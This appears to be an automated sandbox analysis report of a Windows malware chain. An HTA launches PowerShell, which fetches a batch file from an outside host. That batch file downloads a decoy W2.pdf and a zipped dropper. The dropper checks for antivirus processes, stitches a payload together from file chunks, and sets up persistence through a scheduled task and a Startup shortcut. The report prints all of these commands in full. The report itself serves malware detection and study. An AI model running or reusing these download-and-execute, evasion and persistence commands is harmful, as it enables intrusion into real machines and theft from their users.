Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00299FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,36_2_00299FD2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F69FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,38_2_00F69FD2

System Summary

barindex
Drops large PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile dump: msword.exe.13.dr 597659152Jump to dropped file
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.exeJump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Wscript called in batch mode (surpress errors)
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00274763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,36_2_00274763
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00261B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,36_2_00261B4D
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,16_2_00403883
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,36_2_0026F20D
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F3F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,38_2_00F3F20D
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\EquationsHighlights
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\OurProperty
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\ItemAnytime
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\ExpenditureBlood
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\DentalSubtle
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04817E8C2_2_04817E8C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04818A482_2_04818A48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_048195162_2_04819516
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_0040497C16_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_00406ED216_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_004074BB16_2_004074BB
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0022801736_2_00228017
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0021E14436_2_0021E144
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0020E1F036_2_0020E1F0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0023A26E36_2_0023A26E
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002222A236_2_002222A2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002022AD36_2_002022AD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0021C62436_2_0021C624
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0023E87F36_2_0023E87F
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0028C8A436_2_0028C8A4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00272A0536_2_00272A05
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00236ADE36_2_00236ADE
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00268BFF36_2_00268BFF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0021CD7A36_2_0021CD7A
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0022CE1036_2_0022CE10
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0023715936_2_00237159
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0020924036_2_00209240
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0029531136_2_00295311
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002096E036_2_002096E0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0022170436_2_00221704
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00221A7636_2_00221A76
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00209B6036_2_00209B60
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00227B8B36_2_00227B8B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00221D2036_2_00221D20
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00227DBA36_2_00227DBA
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00221FE736_2_00221FE7
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF801738_2_00EF8017
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EDE1F038_2_00EDE1F0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EEE14438_2_00EEE144
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00ED22AD38_2_00ED22AD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF22A238_2_00EF22A2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F0A26E38_2_00F0A26E
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EEC62438_2_00EEC624
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F5C8A438_2_00F5C8A4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F0E87F38_2_00F0E87F
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F06ADE38_2_00F06ADE
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F42A0538_2_00F42A05
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F38BFF38_2_00F38BFF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EECD7A38_2_00EECD7A
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EFCE1038_2_00EFCE10
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F0715938_2_00F07159
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00ED924038_2_00ED9240
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F6531138_2_00F65311
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00ED96E038_2_00ED96E0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF170438_2_00EF1704
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF1A7638_2_00EF1A76
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF7B8B38_2_00EF7B8B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00ED9B6038_2_00ED9B60
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF7DBA38_2_00EF7DBA
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF1D2038_2_00EF1D20
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF1FE738_2_00EF1FE7
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: String function: 00EF0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: String function: 00220DA0 appears 46 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: String function: 0021FD52 appears 40 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: String function: 00EEFD52 appears 40 times
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@70/98@8/2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002741FA GetLastError,FormatMessageW,36_2_002741FA
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00262010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,36_2_00262010
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00261A0B AdjustTokenPrivileges,CloseHandle,36_2_00261A0B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F32010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,38_2_00F32010
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F31A0B AdjustTokenPrivileges,CloseHandle,38_2_00F31A0B
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,16_2_004044A5
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,36_2_0026DD87
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_004024FB CoCreateInstance,16_2_004024FB
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00273A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,36_2_00273A0E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\W2.pdfJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3916:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtm2w1bd.swg.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1344,i,14857468376700330533,7466528391267394821,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1344,i,14857468376700330533,7466528391267394821,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
